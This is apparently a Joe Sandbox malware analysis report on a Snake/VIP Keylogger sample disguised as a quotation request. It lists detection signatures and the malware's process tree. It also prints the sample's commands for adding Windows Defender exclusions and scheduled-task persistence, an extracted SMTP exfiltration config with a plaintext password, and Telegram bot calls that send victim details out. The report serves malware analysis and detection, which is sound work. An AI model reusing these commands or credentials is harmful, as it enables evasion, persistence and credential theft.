Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Overview

General Information

Sample name:Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Analysis ID:1560113
MD5:1ae7a890014eba9c807c6adeabac7671
SHA1:e3b92645849a3e064d9fc401badf115dab013839
SHA256:bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
Tags:exeuser-TeamDreier
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe (PID: 2440 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" MD5: 1AE7A890014EBA9C807C6ADEABAC7671)
    • powershell.exe (PID: 4784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIADAP.exe (PID: 6112 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • NuDUTBObHpKADz.exe (PID: 7428 cmdline: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe MD5: 1AE7A890014EBA9C807C6ADEABAC7671)
    • schtasks.exe (PID: 7588 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NuDUTBObHpKADz.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" MD5: 1AE7A890014EBA9C807C6ADEABAC7671)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0x2c6ae:$a1: get_encryptedPassword
  • 0x2c9cb:$a2: get_encryptedUsername
  • 0x2c4be:$a3: get_timePasswordChanged
  • 0x2c5c7:$a4: get_passwordField
  • 0x2c6c4:$a5: set_encryptedPassword
  • 0x2dd5f:$a7: get_logins
  • 0x2dcc2:$a10: KeyLoggerEventArgs
  • 0x2d927:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 18 entries
          SourceRuleDescriptionAuthorStrings
          9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2d8ae:$a1: get_encryptedPassword
                • 0x2dbcb:$a2: get_encryptedUsername
                • 0x2d6be:$a3: get_timePasswordChanged
                • 0x2d7c7:$a4: get_passwordField
                • 0x2d8c4:$a5: set_encryptedPassword
                • 0x2ef5f:$a7: get_logins
                • 0x2eec2:$a10: KeyLoggerEventArgs
                • 0x2eb27:$a11: KeyLoggerEventArgsEventHandler
                9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b664:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3ad07:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3af64:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3b943:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 25 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ProcessId: 4784, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ProcessId: 4784, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe, ParentImage: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe, ParentProcessId: 7428, ParentProcessName: NuDUTBObHpKADz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp", ProcessId: 7588, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", ProcessId: 6112, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ProcessId: 4784, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ParentProcessId: 2440, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp", ProcessId: 6112, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-21T12:20:16.938410+010028033053Unknown Traffic192.168.2.949734188.114.97.3443TCP
                2024-11-21T12:20:20.211067+010028033053Unknown Traffic192.168.2.949748188.114.97.3443TCP
                2024-11-21T12:20:22.138040+010028033053Unknown Traffic192.168.2.949751188.114.97.3443TCP
                2024-11-21T12:20:25.348486+010028033053Unknown Traffic192.168.2.949764188.114.97.3443TCP
                2024-11-21T12:20:26.637765+010028033053Unknown Traffic192.168.2.949767188.114.97.3443TCP
                2024-11-21T12:20:28.506892+010028033053Unknown Traffic192.168.2.949775188.114.97.3443TCP
                2024-11-21T12:20:34.843367+010028033053Unknown Traffic192.168.2.949797188.114.97.3443TCP
                2024-11-21T12:20:37.955589+010028033053Unknown Traffic192.168.2.949806188.114.97.3443TCP
                2024-11-21T12:20:44.227515+010028033053Unknown Traffic192.168.2.949828188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-21T12:20:12.874125+010028032742Potentially Bad Traffic192.168.2.949720193.122.6.16880TCP
                2024-11-21T12:20:15.264721+010028032742Potentially Bad Traffic192.168.2.949720193.122.6.16880TCP
                2024-11-21T12:20:18.108479+010028032742Potentially Bad Traffic192.168.2.949740193.122.6.16880TCP
                2024-11-21T12:20:18.467840+010028032742Potentially Bad Traffic192.168.2.949741193.122.6.16880TCP
                2024-11-21T12:20:20.467892+010028032742Potentially Bad Traffic192.168.2.949740193.122.6.16880TCP
                2024-11-21T12:20:21.655388+010028032742Potentially Bad Traffic192.168.2.949749193.122.6.16880TCP
                2024-11-21T12:20:23.624113+010028032742Potentially Bad Traffic192.168.2.949757193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeReversingLabs: Detection: 52%
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeJoe Sandbox ML: detected
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 0741AF54h0_2_0741B66D
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 0162F45Dh9_2_0162F2C0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 0162F45Dh9_2_0162F52F
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 0162F45Dh9_2_0162F4AC
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 0162FC19h9_2_0162F961
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE31E0h9_2_06DE2DC8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE0D0Dh9_2_06DE0B30
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE1697h9_2_06DE0B30
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE2C19h9_2_06DE2968
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEE959h9_2_06DEE6B0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEE0A9h9_2_06DEDE00
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEF209h9_2_06DEEF60
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DECF49h9_2_06DECCA0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE31E0h9_2_06DE2DC2
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DED7F9h9_2_06DED550
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEE501h9_2_06DEE258
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEF661h9_2_06DEF3B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEEDB1h9_2_06DEEB08
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DED3A1h9_2_06DED0F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06DE0040
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEFAB9h9_2_06DEF810
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DEDC51h9_2_06DED9A8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 4x nop then jmp 06DE31E0h9_2_06DE310E
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0269F45Dh14_2_0269F2D3
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0269F45Dh14_2_0269F4AC
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0269FC19h14_2_0269F974
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 06550D0Dh14_2_06550B30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 06551697h14_2_06550B30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 06552C19h14_2_06552968
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 065531E0h14_2_06552DC8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655E501h14_2_0655E258
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06550673
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655E0A9h14_2_0655DE00
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655E959h14_2_0655E6B0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655F209h14_2_0655EF60
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655EDB1h14_2_0655EB08
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655F661h14_2_0655F3B8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06550853
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06550040
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655FAB9h14_2_0655F810
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655D3A1h14_2_0655D0F8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655CF49h14_2_0655CCA0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655D7F9h14_2_0655D550
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 065531E0h14_2_0655310E
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 065531E0h14_2_06552DC2
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 4x nop then jmp 0655DC51h14_2_0655D9A8

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
